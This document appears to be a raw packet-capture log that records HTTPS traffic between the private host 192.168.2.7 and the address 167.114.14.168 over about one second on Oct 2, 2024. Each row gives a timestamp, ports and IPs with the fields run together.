                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.751815081 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.751882076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.751882076 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.751888990 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.751996040 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.758229971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.758274078 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.758323908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.758332014 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.758359909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.758404970 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839198112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839222908 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839274883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839289904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839324951 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839339972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839688063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839706898 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839741945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839747906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839778900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.839828968 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840065002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840085983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840154886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840162039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840226889 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840645075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840665102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840697050 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840702057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840739965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.840739965 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841216087 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841234922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841288090 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841294050 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841304064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841341972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841696024 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841716051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841788054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841794968 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.841835022 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.842175007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.842192888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.842241049 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.842248917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.842289925 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.848830938 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.848855019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.848925114 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.848933935 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.848942995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.848999023 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.930695057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.930727005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.930799961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.930819035 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.930836916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.930999994 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.931654930 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.931685925 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.931893110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.931893110 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.931905031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.931969881 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932153940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932176113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932256937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932256937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932265997 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932446003 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932673931 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932696104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932770014 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932770014 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932776928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.932853937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933557034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933578968 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933636904 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933643103 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933700085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933731079 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933754921 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933777094 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933815956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933821917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933866024 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.933866024 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.934536934 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.934571981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.934624910 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.934631109 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.934676886 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.934730053 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.940005064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.940030098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.940119028 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.940129995 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:45.940181017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.021581888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.021615982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.021677017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.021694899 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.021724939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.021724939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022072077 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022095919 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022145987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022152901 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022180080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022211075 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022891998 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.022918940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023013115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023019075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023068905 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023119926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023593903 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023617983 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023751974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023760080 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.023808956 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024120092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024142981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024197102 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024204969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024234056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024245977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024780989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024801016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024851084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024857044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024887085 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.024936914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.025437117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.025461912 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.025518894 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.025526047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.025543928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.025579929 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.030138969 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.030164003 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.030219078 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.030227900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.030256033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.030281067 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111664057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111737967 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111799002 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111823082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111865997 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111903906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111922026 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.111968994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112018108 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112025023 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112062931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112062931 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112649918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112699032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112730980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112739086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112771988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.112771988 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113302946 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113348007 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113390923 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113398075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113441944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113441944 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113883018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113926888 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113989115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.113997936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114029884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114029884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114351034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114397049 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114433050 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114440918 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114478111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114478111 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114789963 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114831924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114897966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114897966 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.114916086 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.115048885 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.120904922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.120969057 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.120984077 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.121000051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.121046066 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.121046066 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.202410936 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.202461004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.202522039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.202541113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.202565908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.202596903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.202958107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203001022 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203071117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203071117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203079939 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203162909 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203447104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203490019 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203519106 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203537941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203581095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.203581095 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204098940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204143047 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204195976 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204205036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204240084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204240084 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204720974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204761982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204811096 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204818010 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204840899 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.204870939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205177069 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205219984 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205271959 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205279112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205312967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205420017 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205598116 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205641031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205671072 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205688000 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205729961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.205729961 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.211451054 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.211508036 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.211560011 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.211568117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.211611986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.211611986 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.292948008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293009043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293045998 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293064117 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293093920 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293138027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293529987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293575048 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293651104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293651104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293658972 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293704033 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.293989897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.294037104 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.294063091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.294070959 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:46.294173002 CEST49713443192.168.2.7167.114.14.168
